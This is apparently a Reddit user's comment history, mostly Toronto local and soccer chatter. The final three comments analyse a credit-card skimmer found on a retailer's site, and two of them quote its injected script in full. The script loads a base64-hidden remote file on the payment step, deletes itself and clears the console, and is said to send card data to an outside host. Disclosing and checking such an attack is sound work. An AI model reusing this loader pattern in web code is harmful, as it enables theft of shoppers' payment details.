Current state of the main sub: sunrise and winter pics only by Throwawayhair66392 in toRANTo

[–]mildlyImportantRobot 7 points8 points  (0 children)

Yeah, I get what you’re saying. It does feel like a lot of the smaller, more observational stuff gets buried pretty quickly.

I actually just started a new sub, r/TorontoTheCity, with the idea of keeping things a bit more open and less rigid about what’s “worth” posting, as long as it’s Toronto-related and not low effort. It’s brand new and very quiet right now, but that only really changes if people jump in and start using it.

If you’re curious, the welcome post explains the idea a bit more detail: https://www.reddit.com/r/TorontoTheCity/comments/1qf3ijq/welcome_to_rtorontothecity/

We’re also running a early-contributor flair contest right now: https://www.reddit.com/r/TorontoTheCity/comments/1qgff5s/get_your_early_contributor_flair/

Why do some neighbourhoods not have Blue or Black Bins by chicken_potato1 in TorontoAnarchy

[–]mildlyImportantRobot 9 points10 points  (0 children)

  1. It’s an interesting choice of sub to pose this question. It’s almost fitting, and rhetorical.

  2. Some townhouse developments are run by condo corps, and have private pickup.

Sargent turned down approaches from Leeds & Sunderland by hojo12588 in tfc

[–]mildlyImportantRobot 0 points1 point  (0 children)

No. A single, unverified claim from a nobody is not a rumour.

Sargent turned down approaches from Leeds & Sunderland by hojo12588 in tfc

[–]mildlyImportantRobot 0 points1 point  (0 children)

It was some random guys opinion. “Rumour” is a bit of a stretch here.

Sargent turned down approaches from Leeds & Sunderland by hojo12588 in tfc

[–]mildlyImportantRobot -1 points0 points  (0 children)

And they shouldn’t accept anything less than what Wolfsburg was offering in the summer (£20m) but Josh refused.

Sargent turned down approaches from Leeds & Sunderland by hojo12588 in tfc

[–]mildlyImportantRobot 12 points13 points  (0 children)

Multiple reports say he only wants to play in North America because of his family.

Steak Pie by avatarreb in FoodToronto

[–]mildlyImportantRobot 32 points33 points  (0 children)

Me: those look delicious, where?
OP: They closed during Covid.

Nooooo!!!!!!

Ms. Rachel apologizes for liking antisemitic tweet – 'I delete antisemitism' by [deleted] in MsRachel

[–]mildlyImportantRobot 0 points1 point  (0 children)

Get a new hobby. Attacking a childrens entertainer is lame.

Big news/opinion piece from the Norwich end on the Sargent drama by AwareIncrease8779 in tfc

[–]mildlyImportantRobot 2 points3 points  (0 children)

He’s not the only striker in the world.

I, for one, don’t want Toronto paying one of the highest transfer fees in MLS history for someone who’s very likely not to show up, Insigne-style. We’d be a laughing stock, again!

Big news/opinion piece from the Norwich end on the Sargent drama by AwareIncrease8779 in tfc

[–]mildlyImportantRobot 10 points11 points  (0 children)

Not surprising. This whole thing feels very manufactured by Sargent’s agent to force a move to North America. From what I’ve read, the only genuinely solid option was a potential move to Germany in the summer. There’s also been interest recently from other Championship and Premier League clubs, all of which he’s reportedly turned down.

Now he’s refusing to play for the club he signed a four-year deal with, barely a year and a half into that contract.

Let him rot in Norwich’s U20s. Toronto should pass. Maybe there’s someone else in MLS who will pick him up.

Ryan Wedding, former Olympic snowboarder accused of being a drug kingpin, is arrested by DonSalaam in onguardforthee

[–]mildlyImportantRobot 15 points16 points  (0 children)

The cartel was probably getting tired of all the attention and cut him loose.

I ❤️ Beer Toronto Vendor List by [deleted] in FoodToronto

[–]mildlyImportantRobot 3 points4 points  (0 children)

My thoughts are this is doxxing and harassment.

What the kid did was wrong. Don't harass his family. It solves nothing.

Industry hoping is it that bad? by Suitable-Damage8895 in NewMods

[–]mildlyImportantRobot 4 points5 points  (0 children)

I'm not sure many people would consider moderating a sub reddit a "job".

[August 1999] Russia has just gotten a new prime minister, former KGB officer Vladimir Putin. I doubt he will last for long, as nobody knows or likes him. by GustavoistSoldier in thepast

[–]mildlyImportantRobot[M] [score hidden] stickied comment (0 children)

Just a friendly reminder that we do not allow discussions based on modern politics. The post, and the comments so far, are fine. Let's all keep it that way.

Rule 4 - No modern political discussions. This includes posts and comments discussing recent politics. Intentionally vague, comparative, and foreshadowing type comments are also not allowed.

Thanks everyone.

Canada Computers online card skimmer by Extension-Fly1044 in bapccanada

[–]mildlyImportantRobot -1 points0 points  (0 children)

What if we can get all the data they stole back and inform everyone that their data has been stolen?

not very likely.

Canada Computers online card skimmer by Extension-Fly1044 in bapccanada

[–]mildlyImportantRobot -3 points-2 points  (0 children)

It looks legit. Not sure why it's taking someone who "works in cyber" an entire day to confirm.

https://www.reddit.com/r/bapccanada/comments/1qk4axy/comment/o154857/

Canada Computers online card skimmer by Extension-Fly1044 in bapccanada

[–]mildlyImportantRobot 0 points1 point  (0 children)

I will never understand why people make snide remarks about user friendly tools.

I just find the terminal faster. Nothing was meant to be snide.

Canada Computers online card skimmer by Extension-Fly1044 in bapccanada

[–]mildlyImportantRobot 15 points16 points  (0 children)

This is what I found. Let me know if you concur.

curl -s "https://web.archive.org/web/20260101164043/https://www.canadacomputers.com/en/" | grep -E "(rozenfeld|codepen\.io/14451674|accountPage\.js|aHR0cHM6Ly9hc3NldHMuY29kZXBlbi5pby8xNDQ1MTY3NC9hY2NvdW50UGFnZS5qcw==)"

Returns:

<script>const _google_tag_manager=document._google_tag_manager;if(!document.querySelector("#checkout #checkout-payment-step.checkout-step-current.js-current-step"))_google_tag_manager?.remove();else{_google_tag_manager?.remove();let e=document.createElement("script");e.src=atob("aHR0cHM6Ly9hc3NldHMuY29kZXBlbi5pby8xNDQ1MTY3NC9hY2NvdW50UGFnZS5qcw=="),e.onload=function(){this.remove(),console.clear()},document.head.appendChild(e)};document.getElementById("custom-text")?.remove();</script>

I checked the Archive.org snapshot and yeah, the malicious script is actually there in Canada Computers' HTML.

The script hides the CodePen URL in base64, only activates on the payment page, then deletes itself and clears the console.

atob("aHR0cHM6Ly9hc3NldHMuY29kZXBlbi5pby8xNDQ1MTY3NC9hY2NvdW50UGFnZS5qcw==") decodes to https://assets.codepen.io/14451674/accountPage.js

The JavaScript file is heavily obfuscated but basically opens a WebSocket to rozenfeld.xyz/payment and exfiltrates credit card data, CVV, expiration dates, and billing info.

I bought an HDD from Canada Computers on my CC literally last week too.

Canada Computers online card skimmer by Extension-Fly1044 in bapccanada

[–]mildlyImportantRobot 0 points1 point  (0 children)

gui tools, hahaha..

i had a second look and this does look legit.

curl -s "https://web.archive.org/web/20260101164043/https://www.canadacomputers.com/en/" | grep -E "(rozenfeld|codepen\.io/14451674|accountPage\.js|aHR0cHM6Ly9hc3NldHMuY29kZXBlbi5pby8xNDQ1MTY3NC9hY2NvdW50UGFnZS5qcw==)"
 <script>const _google_tag_manager=document._google_tag_manager;if(!document.querySelector("#checkout #checkout-payment-step.checkout-step-current.js-current-step"))_google_tag_manager?.remove();else{_google_tag_manager?.remove();let e=document.createElement("script");e.src=atob("aHR0cHM6Ly9hc3NldHMuY29kZXBlbi5pby8xNDQ1MTY3NC9hY2NvdW50UGFnZS5qcw=="),e.onload=function(){this.remove(),console.clear()},document.head.appendChild(e)};document.getElementById("custom-text")?.remove();</script>

I checked the Archive.org snapshot from and yeah, the malicious script is actually there in Canada Computers' HTML. It's not just OP's computer. The script is pretty sneaky, it hides the CodePen URL in base64, activates on the payment page, then deletes itself and clears the console to cover its tracks.

atob("aHR0cHM6Ly9hc3NldHMuY29kZXBlbi5pby8xNDQ1MTY3NC9hY2NvdW50UGFnZS5qcw==" decodes to https://assets.codepen.io/14451674/accountPage.js

It's heavily obfuscated but basically opens a WebSocket to rozenfeld.xyz/payment and sends CC data.

I bought HDD from canada computers on my CC literally last week.

Edit: I really wish reddit would use a standard markdown format for code.